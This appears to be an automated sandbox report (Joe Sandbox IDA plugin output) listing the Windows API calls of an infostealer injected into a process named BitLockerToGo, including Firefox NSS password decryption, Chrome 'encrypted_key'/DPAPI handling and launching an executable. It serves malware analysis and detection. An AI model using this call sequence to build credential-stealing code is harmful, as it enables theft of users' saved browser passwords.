                                                                                                                                                                • NSS_Init.NSS3(00000000), ref: 0300C9A5
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,03555EC8,00000000,?,0302144C,00000000,?,?), ref: 0300CA6C
                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0300CA89
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0300CA95
                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0300CAA8
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0300CAB5
                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0300CAD9
                                                                                                                                                                • StrStrA.SHLWAPI(?,03555C58,03020B52), ref: 0300CAF7
                                                                                                                                                                • StrStrA.SHLWAPI(00000000,03555D90), ref: 0300CB1E
                                                                                                                                                                • StrStrA.SHLWAPI(?,03555770,00000000,?,03021458,00000000,?,00000000,00000000,?,03554F80,00000000,?,03021454,00000000,?), ref: 0300CCA2
                                                                                                                                                                • StrStrA.SHLWAPI(00000000,03555590), ref: 0300CCB9
                                                                                                                                                                  • Part of subcall function 0300C820: memset.MSVCRT ref: 0300C853
                                                                                                                                                                  • Part of subcall function 0300C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,03554E90), ref: 0300C871
                                                                                                                                                                  • Part of subcall function 0300C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0300C87C
                                                                                                                                                                  • Part of subcall function 0300C820: PK11_GetInternalKeySlot.NSS3 ref: 0300C88A
                                                                                                                                                                  • Part of subcall function 0300C820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0300C8A5
                                                                                                                                                                  • Part of subcall function 0300C820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0300C8EB
                                                                                                                                                                  • Part of subcall function 0300C820: memcpy.MSVCRT(?,?,?), ref: 0300C912
                                                                                                                                                                  • Part of subcall function 0300C820: PK11_FreeSlot.NSS3(?), ref: 0300C961
                                                                                                                                                                • StrStrA.SHLWAPI(?,03555590,00000000,?,0302145C,00000000,?,00000000,03554E90), ref: 0300CD5A
                                                                                                                                                                • StrStrA.SHLWAPI(00000000,03554E60), ref: 0300CD71
                                                                                                                                                                  • Part of subcall function 0300C820: lstrcat.KERNEL32(?,03020B46), ref: 0300C943
                                                                                                                                                                  • Part of subcall function 0300C820: lstrcat.KERNEL32(?,03020B47), ref: 0300C957
                                                                                                                                                                  • Part of subcall function 0300C820: lstrcat.KERNEL32(?,03020B4E), ref: 0300C978
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300CE44
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0300CE9C
                                                                                                                                                                • NSS_Shutdown.NSS3 ref: 0300CEAA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$??2@AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmemcpymemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2503097572-3916222277
                                                                                                                                                                • Opcode ID: 857a0d87a727d792c9cef4ca656334f09fded806cd8c9e5ca2c244fed8fdf2cd
                                                                                                                                                                • Instruction ID: f808b52b861b0188e27862d122b8d95d255258ca42a1c742e8e9d19cb0d3c55e
                                                                                                                                                                • Opcode Fuzzy Hash: 857a0d87a727d792c9cef4ca656334f09fded806cd8c9e5ca2c244fed8fdf2cd
                                                                                                                                                                • Instruction Fuzzy Hash: BCE11079A02208ABDB15FBA4ED94FEEB778AF54310F404159F1066B190EF706A5ACF60
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6CC731C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CC73217
                                                                                                                                                                  • Part of subcall function 6CC731C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CC73236
                                                                                                                                                                  • Part of subcall function 6CC731C0: FreeLibrary.KERNEL32 ref: 6CC7324B
                                                                                                                                                                  • Part of subcall function 6CC731C0: __Init_thread_footer.LIBCMT ref: 6CC73260
                                                                                                                                                                  • Part of subcall function 6CC731C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CC7327F
                                                                                                                                                                  • Part of subcall function 6CC731C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7328E
                                                                                                                                                                  • Part of subcall function 6CC731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC732AB
                                                                                                                                                                  • Part of subcall function 6CC731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC732D1
                                                                                                                                                                  • Part of subcall function 6CC731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC732E5
                                                                                                                                                                  • Part of subcall function 6CC731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC732F7
                                                                                                                                                                • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC89675
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CC89697
                                                                                                                                                                • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC896E8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC89707
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CC8971F
                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC89773
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC897B7
                                                                                                                                                                • FreeLibrary.KERNEL32 ref: 6CC897D0
                                                                                                                                                                • FreeLibrary.KERNEL32 ref: 6CC897EB
                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC89824
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                • API String ID: 3361784254-3880535382
                                                                                                                                                                • Opcode ID: 3c45a8079821f90883ad0914f82997ba0f71bedfe46ba3d983a58dedebc3dad0
                                                                                                                                                                • Instruction ID: 72b4438ba3b0abe4b9604ac7b1f9a2d6a0b00e31a33adafcce0b1cf28d391562
                                                                                                                                                                • Opcode Fuzzy Hash: 3c45a8079821f90883ad0914f82997ba0f71bedfe46ba3d983a58dedebc3dad0
                                                                                                                                                                • Instruction Fuzzy Hash: 81619271601205AFDF00DFA9E898B9ABBF5EF4A318F11451AE92597B80E730E845CB91
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitProcessstrtok_s
                                                                                                                                                                • String ID: block
                                                                                                                                                                • API String ID: 3407564107-2199623458
                                                                                                                                                                • Opcode ID: 2d3e7790df15eb64c89603123911d9c42a7271acf796c086b400b191f30513b7
                                                                                                                                                                • Instruction ID: 880a0d8f87220180b1d6ef13df26a0807800ffc6f292477d32cf179977abd2d8
                                                                                                                                                                • Opcode Fuzzy Hash: 2d3e7790df15eb64c89603123911d9c42a7271acf796c086b400b191f30513b7
                                                                                                                                                                • Instruction Fuzzy Hash: D55131B4A06209EFDB0CDFA0E948BBE77B9FF44704F008449E516AB244D775E961CB61
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • memset.MSVCRT ref: 03010C1C
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 03010C35
                                                                                                                                                                • lstrcat.KERNEL32(?,03020D7C), ref: 03010C47
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 03010C5D
                                                                                                                                                                • lstrcat.KERNEL32(?,03020D80), ref: 03010C6F
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 03010C88
                                                                                                                                                                • lstrcat.KERNEL32(?,03020D84), ref: 03010C9A
                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 03010CA7
                                                                                                                                                                • memset.MSVCRT ref: 03010CCD
                                                                                                                                                                • memset.MSVCRT ref: 03010CE1
                                                                                                                                                                  • Part of subcall function 0301A820: lstrlen.KERNEL32(00000000,?,?,03015B54,03020ADB,03020ADA,?,?,03016B16,00000000,?,03540578,?,0302110C,?,00000000), ref: 0301A82B
                                                                                                                                                                  • Part of subcall function 0301A820: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A885
                                                                                                                                                                  • Part of subcall function 03018B60: GetSystemTime.KERNEL32(?,03549910,030205AE,?,?,?,?,?,?,?,?,?,03004963,?,00000014), ref: 03018B86
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 030196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,03010B85,?,00000000,?,00000000,030205C6,030205C5), ref: 030196E1
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,03020D88,?,00000000), ref: 03010D5A
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03010D66
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                                                                                                • String ID: .exe
                                                                                                                                                                • API String ID: 1395395982-4119554291
                                                                                                                                                                • Opcode ID: 07ffe219f97ffb3139a59920e4be499628da894b1a6e49ecef6d90beeb3789bf
                                                                                                                                                                • Instruction ID: 85303c071bf23d8e623065b5d188279b0e7081dfd98c312b8add544d794c2d15
                                                                                                                                                                • Opcode Fuzzy Hash: 07ffe219f97ffb3139a59920e4be499628da894b1a6e49ecef6d90beeb3789bf
                                                                                                                                                                • Instruction Fuzzy Hash: 5B8174B9A53218AFDB14FB60DD55FEE733CAF84214F004199A3066A081EF746B99CF64
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCCD4F0
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCCD4FC
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCCD52A
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCCD530
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCCD53F
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCCD55F
                                                                                                                                                                • free.MOZGLUE(00000000), ref: 6CCCD585
                                                                                                                                                                • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CCCD5D3
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCCD5F9
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCCD605
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCCD652
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CCCD658
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCCD667
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCCD6A2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2206442479-0
                                                                                                                                                                • Opcode ID: 49f009cdd2a6ec9901513f0b25af72743b63558d14fa75257927cff80720a8cb
                                                                                                                                                                • Instruction ID: 9aaab4dc1d68e2a6e98e2a554ae5fe1f1411e7aa170d2289923f54963863a4fe
                                                                                                                                                                • Opcode Fuzzy Hash: 49f009cdd2a6ec9901513f0b25af72743b63558d14fa75257927cff80720a8cb
                                                                                                                                                                • Instruction Fuzzy Hash: D3516DB5604705DFC704DF25D894A9ABBF4FF89318F008A2EE95A87710EB30A945CB92
                                                                                                                                                                APIs
                                                                                                                                                                • strtok_s.MSVCRT ref: 03011307
                                                                                                                                                                • strtok_s.MSVCRT ref: 03011750
                                                                                                                                                                  • Part of subcall function 0301A820: lstrlen.KERNEL32(00000000,?,?,03015B54,03020ADB,03020ADA,?,?,03016B16,00000000,?,03540578,?,0302110C,?,00000000), ref: 0301A82B
                                                                                                                                                                  • Part of subcall function 0301A820: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A885
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 348468850-0
                                                                                                                                                                • Opcode ID: 4212ec6b3b3054f3941f22b930817d0fc54d04dd3ca4da3a9dfa1505a47554ea
                                                                                                                                                                • Instruction ID: 786dbf9c694352137e6ffd91c37cf79f3458275dd91b5e2b359deb47c13b3e95
                                                                                                                                                                • Opcode Fuzzy Hash: 4212ec6b3b3054f3941f22b930817d0fc54d04dd3ca4da3a9dfa1505a47554ea
                                                                                                                                                                • Instruction Fuzzy Hash: 37C199B99423199BCB18EF60DC88FDE7778BF94304F004599E50A6B241DB74EA95CF90
                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0301429E
                                                                                                                                                                • memset.MSVCRT ref: 030142B5
                                                                                                                                                                  • Part of subcall function 03018DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 03018E0B
                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 030142EC
                                                                                                                                                                • lstrcat.KERNEL32(?,03556270), ref: 0301430B
                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 0301431F
                                                                                                                                                                • lstrcat.KERNEL32(?,03555CB8), ref: 03014333
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 03018D90: GetFileAttributesA.KERNEL32(00000000,?,03010117,?,00000000,?,00000000,03020DAB,03020DAA), ref: 03018D9F
                                                                                                                                                                  • Part of subcall function 03009CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 03009D39
                                                                                                                                                                  • Part of subcall function 03009CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 03009D92
                                                                                                                                                                  • Part of subcall function 030099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 030099EC
                                                                                                                                                                  • Part of subcall function 030099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 03009A11
                                                                                                                                                                  • Part of subcall function 030099C0: LocalAlloc.KERNEL32(00000040,?), ref: 03009A31
                                                                                                                                                                  • Part of subcall function 030099C0: ReadFile.KERNEL32(000000FF,?,00000000,030102E7,00000000), ref: 03009A5A
                                                                                                                                                                  • Part of subcall function 030099C0: LocalFree.KERNEL32(030102E7), ref: 03009A90
                                                                                                                                                                  • Part of subcall function 030099C0: CloseHandle.KERNEL32(000000FF), ref: 03009A9A
                                                                                                                                                                  • Part of subcall function 030193C0: GlobalAlloc.KERNEL32(00000000,030143DD,030143DD), ref: 030193D3
                                                                                                                                                                • StrStrA.SHLWAPI(?,035562D0), ref: 030143F3
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 03014512
                                                                                                                                                                  • Part of subcall function 03009AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,03004EEE,00000000,00000000), ref: 03009AEF
                                                                                                                                                                  • Part of subcall function 03009AC0: LocalAlloc.KERNEL32(00000040,?,?,?,03004EEE,00000000,?), ref: 03009B01
                                                                                                                                                                  • Part of subcall function 03009AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,03004EEE,00000000,00000000), ref: 03009B2A
